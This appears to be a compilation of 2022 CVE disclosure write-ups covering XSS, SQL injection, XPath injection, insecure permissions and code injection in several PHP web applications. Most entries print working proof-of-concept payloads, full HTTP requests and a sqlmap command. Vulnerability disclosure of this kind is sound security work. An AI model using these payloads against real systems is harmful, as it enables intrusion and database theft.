SolarView Compact 7.0 is vulnerable to Cross-site Scripting (XSS) via /network_test.php.

**Cross-site Scripting (XSS) in all SolarView Compact v7.00****Description**

Cross-site Scripting (XSS) - Reflected in SolarView Compact v7.0 via crafted POST request to /network\_test.php

**POC**

When someone opens this html file, or we can add it into our website, XSS will execute.

    <html>
      <body>
      <script>history.pushState('', '', '/')</script>
        <form action="http://{HOST}/network_test.php" method="POST">
          <input type="hidden" name="host" value="127&#46;0&#46;0&#46;1" />
          <input type="hidden" name="command" value="test&apos;&lt;script&gt;alert&#40;'XSS_By_Strik3r'&#41;&lt;&#47;script&gt;" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>
    

**Impact**

The consequence of an XSS attack is the same regardless of whether it is stored or reflected (or DOM Based). The difference is in how the payload arrives at the server. If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. Amongst other things, the attacker can:

*   Perform any action within the application that the user can perform.
*   View any information that the user is able to view.
*   Modify any information that the user is able to modify.
*   Initiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user.

CVE-2022-44355: Vulns/SolarView Compact XSS up to 7.0.md at main · strik3r0x1/Vulns

Concrete CMS version 9.1.3 suffers from an XPATH injection vulnerability.

## Title: concretecms-9.1.3 Xpath injection## Author: nu11secur1ty## Date: 11.28.2022## Vendor: https://www.concretecms.org/## Software: https://www.concretecms.org/download## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/concretecms.org/2022/concretecms-9.1.3## Description:The URL path folder `3` appears to be vulnerable to XPath injection attacks.The test payload 50539478' or 4591=4591-- was submitted in the URLpath folder `3`, and an XPath error message was returned.The attacker can flood with requests the system by using thisvulnerability to untilted he receives the actual paths of the allcontent of this system which content is stored on some internal orexternal server.## STATUS: HIGH Vulnerability[+] Exploits:00:```GETGET /concrete-cms-9.1.3/index.php/ccm50539478'%20or%204591%3d4591--%20/assets/localization/moment/jsHTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Connection: closeCache-Control: max-age=0Upgrade-Insecure-Requests: 1Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 0```[+] Response:```HTTPHTTP/1.1 500 Internal Server ErrorDate: Mon, 28 Nov 2022 15:32:22 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30X-Powered-By: PHP/7.4.30Connection: closeContent-Type: text/html;charset=UTF-8Content-Length: 592153<!DOCTYPE html><html>  <head>    <meta charset="utf-8">    <meta name="robots" content="noindex,nofollow"/>    <meta name="viewport" content="width=device-width,initial-scale=1, shrink-to-fit=no"/>    <title>Concrete CMS has encountered an issue.</title>    <style>body {  font: 12px "Helvetica Neue", helvetica, arial, sans-serif;  color: #131313;  background: #eeeeee;  padding:0;  margin: 0;  max-height: 100%;  text-rendering: optimizeLegibility;}  a {    text-decoration: none;  }.Whoops.container {    position: relative;    z-index: 9999999999;}.panel {    overflow-y: scroll;    height: 100%;    position: fixed;    margin: 0;    left: 0;    top: 0;}.branding {  position: absolute;  top: 10px;  right: 20px;  color: #777777;  font-size: 10px;    z-index: 100;}  .branding a {    color: #e95353;  }header {  color: white;  box-sizing: border-box;  background-color: #2a2a2a;  padding: 35px 40px;  max-height: 180px;  overflow: hidden;  transition: 0.5s;}  header.header-expand {    max-height: 1000px;  }  .exc-title {    margin: 0;    color: #bebebe;    font-size: 14px;  }    .exc-title-primary, .exc-title-secondary {      color: #e95353;    }    .exc-message {      font-size: 20px;      word-wrap: break-word;      margin: 4px 0 0 0;      color: white;    }      .exc-message span {        display: block;      }      .exc-message-empty-notice {        color: #a29d9d;        font-weight: 300;      }.......```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/concretecms.org/2022/concretecms-9.1.3)## Proof and Exploit:[href](https://streamable.com/4f60ka)## Time spent`03:00:00`

Concrete CMS 9.1.3 XPATH Injection

AeroCMS v0.0.1 was discovered to contain a SQL Injection vulnerability via the Search parameter. This vulnerability allows attackers to access database information.

**Step to Reproduct**

*   The search parameter from the AeroCMS-v0.0.1 CMS system appears to be vulnerable to SQL injection attacks. The malicious user can dump-steal the database, from this CMS system and he can use it for very malicious purposes.

**Exploit**

Query out the current user

**Vulnerable Code**

The search parameter is passed in the POST mode and brought into the mysql\_query() function without filtering

**SQL query statements**

    "SELECT * FROM posts WHERE post_tags LIKE '%a%' union select 1,2,user(),4,5,6,7,8,9,10,11,12-- q%'"
    

**POC**

*   Injection Point

    search=a%' union select 1,2,user(),4,5,6,7,8,9,10,11,12-- q
    

*   Request

    POST /AeroCMS-0.0.1/search.php HTTP/1.1
    Host: localhost
    Content-Length: 31
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://localhost/AeroCMS-0.0.1/post.php?p_id=1
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=ffopa5dean7sk0fe55kc93e163
    Connection: close
    
    search=a%' union select 1,2,user(),4,5,6,7,8,9,10,11,12-- q&submit=

CVE-2022-45329: CVE/search_sql_injection.md at master · rdyx0/CVE

Online-shopping-system-advanced 1.0 was discovered to contain a SQL injection vulnerability via the p parameter at /shopping/product.php.

**Vulnerability Explanation:**

Online-shopping-system-advanced was discovered to contain a SQL injection vulnerability via the p parameter at /shopping/product.php

**Affected Component:**

http://\[ip\]/shopping/product.php?p=72

**Payload:**

Parameter: p (GET)  
    Type: UNION query  
    Title: Generic UNION query (NULL) - 8 columns  
    Payload: p=72 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716b6a6271,0x61644f4c796848674f74444476795064457842697a416649624d78546f4152624f78644a77446867,0x7170707071),NULL,NULL,NULL,NULL-- -

**Tested on:**

1.  Online-shopping-system-advanced

https://github.com/PuneethReddyHC/online-shopping-system-advanced

**Steps to attack:**

1.  Go to the mainpage and click on head-phone product.

4\. We’ll found /shopping/product.php?p=72

5.Using sqlmap with our URL by the following the command below:

sqlmap -u "http://\[IP\]/shopping/product.php?p=72" --batch --threads 10 --technique U --dbs

6\. We discovered SQL injection vulnerability via the p parameter.

**Discoverer:**

Grim The Ripper Team by SOSECURE Thailand

**Reference:**

https://github.com/PuneethReddyHC/online-shopping-system-advanced

CVE-2022-42109: Online-shopping-system-advanced — SQL Injection at product.php

ChurchCRM Version 4.4.5 has XSS vulnerabilities that allow attackers to store XSS via location input sHeader.

**Vulnerability Explanation:**

ChurchCRM Version 4.4.5 has XSS vulnerabilities that allow attackers to store XSS via location input sHeader.

**Affected Component:**

http://ip\_address:port/churchcrm/SystemSettings.php

**Payload :**

<img src="test" onerror=confirm("Grim-The-Ripper-Team-by-SOSECURE-Thailand")>

**Tested on:**

1.  ChurchCRM Version 4.4.5 https://github.com/ChurchCRM/CRM/releases/tag/4.4.5
2.  Google Chrome Version 103.0.5060.114 (Official Build) (64-bit)

**Steps to attack:**

1.  Login with admin credential.

2\. Go to the “Admin” as show in the picture and Click on the “Edit General Settings”

3\. Next, Go to the “System Settings”. click on the “sHeader” input then enter the XSS payload and press the Save Settings button.

4\. After refresh this page The XSS payload will run immediately.

**Discoverer:**

Grim The Ripper Team by SOSECURE Thailand

**Reference:**

https://churchcrm.io  
https://github.com/ChurchCRM/CRM/releases/tag/4.4.5

CVE-2022-36137: ChurchCRM Version 4.4.5 — Stored XSS Vulnerability at sHeader

ChurchCRM Version 4.4.5 has XSS vulnerabilities that allow attackers to store XSS via location input Deposit Comment.

**Vulnerability Explanation:**

ChurchCRM Version 4.4.5 has XSS vulnerabilities that allow attackers to store XSS via location input Deposit Comment.

**Affected Component:**

http://ip\_address:port/churchcrm/FindDepositSlip.php

**Payload :**

<img src="test" onerror=confirm("Grim-The-Ripper-Team-by-SOSECURE-Thailand")>

**Tested on:**

1.  ChurchCRM Version 4.4.5 https://github.com/ChurchCRM/CRM/releases/tag/4.4.5
2.  Google Chrome Version 103.0.5060.114 (Official Build) (64-bit)

**Steps to attack:**

1.  Login with admin credential.

2\. Go to the “Deposit” as show in the picture and Click on the “View All Deposits” then click on the “Deposit Comment” enter the XSS payload and press the “Add New Deposit” button.

3\. After press the “Add New Deposit” button The XSS payload will run immediately.

**Discoverer:**

Grim The Ripper Team by SOSECURE Thailand

**Reference:**

https://churchcrm.io  
https://github.com/ChurchCRM/CRM/releases/tag/4.4.5

CVE-2022-36136: ChurchCRM Version 4.4.5 — Stored XSS Vulnerability at Deposit Commend

Insecure permissions in Chocolatey PHP package v8.1.12 and below grants all users in the Authenticated Users group write privileges for the subfolder C:\tools\php81 and all files located in that folder.

**Incorrect default permission of php if installed by chocolatey****Basic Info**

Description：If we use chocolaty to install php in windows System.The default install dir of php is C:\\tools\\php81, howerver, the permission of C:\\tools\\php81 is inherited from C:, so all Users in Authenticated Users group have write permission of path C:\\tools\\php81 and files in it.

Vuln Type: CWE-276

Website: https://community.chocolatey.org/packages/php

Install Command : choco install php --version=8.1.12

Vuln Version: php 8.1.12 and below

**Vuln Analyse**

*   Use chocolatey to install php in Windows system

*   We can see that All Users in Authenticated Users group have write permission of C:\\tools\\php81 and files in it.

So an attacker with low privilege can hijack binary like C:\\tools\\php81\\php.exe to execute arbitrary code when administrator or other users use php installed by chocolatey.

CVE-2022-45307: Vuln/php-weak-permission-vuln.md at main · ycdxsb/Vuln

A cross-site scripting (XSS) vulnerability in Sanitization Management System v1.0.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the username parameter at /php-sms/classes/Login.php.

\> \[Suggested description\]

\> A cross-site scripting (XSS) vulnerability in Sanitization Management

\> System v1.0.0 allows attackers to execute arbitrary web scripts or HTML

\> via a crafted payload injected into the username parameter at

\> /php-sms/classes/Login.php.

\>

\> ------------------------------------------

\>

\> \[Vulnerability Type\]

\> Cross Site Scripting (XSS)

\>

\> ------------------------------------------

\>

\> \[Vendor of Product\]

\> https://www.sourcecodester.com

\>

\> ------------------------------------------

\>

\> \[Affected Product Code Base\]

\> Sanitization Management System - V 1.0.0

\>

\> ------------------------------------------

\>

\> \[Affected Component\]

\> username

\>

\> ------------------------------------------

\>

\> \[Attack Type\]

\> Local

\>

\> ------------------------------------------

\>

\> \[Impact Code execution\]

\> true

\>

\> ------------------------------------------

\>

\> \[Reference\]

\> https://www.sourcecodester.com/php/15770/sanitization-management-system-project-php-and-mysql-free-source-code.html

\>

\> ------------------------------------------

\>

\> \[Discoverer\]

\> Rajeshwar Singh

Use CVE-2022-45214.

CVE-2022-45214: CVE/CVE-2022-45214.txt at main · Rajeshwar40/CVE

Web-Based Student Clearance System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability in /Admin/add-student.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the txtfullname parameter.

**1\. /changepassword.php**

txtold\_password、txtnew\_password、txtconfirm\_password

**payload:**

**txtold\_password="><script>alert(1)</script><"**

**poc:**

POST /changepassword.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 45  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/changepassword.php  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: none  
Sec-Fetch-User: ?1txtold\_password="><script>alert(1)</script><"

**2\. **/Admin/changepassword.php****

txtold\_password、txtnew\_password、txtconfirm\_password

**payload:**

**txtold\_password="><script>alert(1)</script><"**

POC:

POST /admin/changepassword.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 45  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/admin/index.php  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: none  
Sec-Fetch-User: ?1txtold\_password="><script>alert(1)</script><"

****3./Admin/add-admin.php****

txtusername

**payload:**

txtusername="><script>alert(1)</script><"

**poc:**

POST /Admin/add-admin.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 41  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/Admin/add-admin.php  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: none  
Sec-Fetch-User: ?1txtusername="><script>alert(1)</script><"

****4./Admin/add-student.php****

**txtfullname**

POST /Admin/add-student.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 63  
Origin: http://localhost  
Connection: close  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: none  
Sec-Fetch-User: ?1txtfullname="><script>alert(1)</script><"

Reference:

https://www.sourcecodester.com/php/15627/web-based-student-clearance-system.html

CVE-2022-45223: Web-Based Student Clearance System in PHP Free Source Code v1.0 — Unrestricted input leads to xss

code injection in `Wrapper::buildClientWrapperCode` via manipulation of the `$client` argument. It was possible to force the client to access local files or connect to undesired urls instead of the intended target server's url.

**code injection in phpxmlrpc/phpxmlrpc**

High severity GitHub Reviewed Published Nov 28, 2022

Tag

#php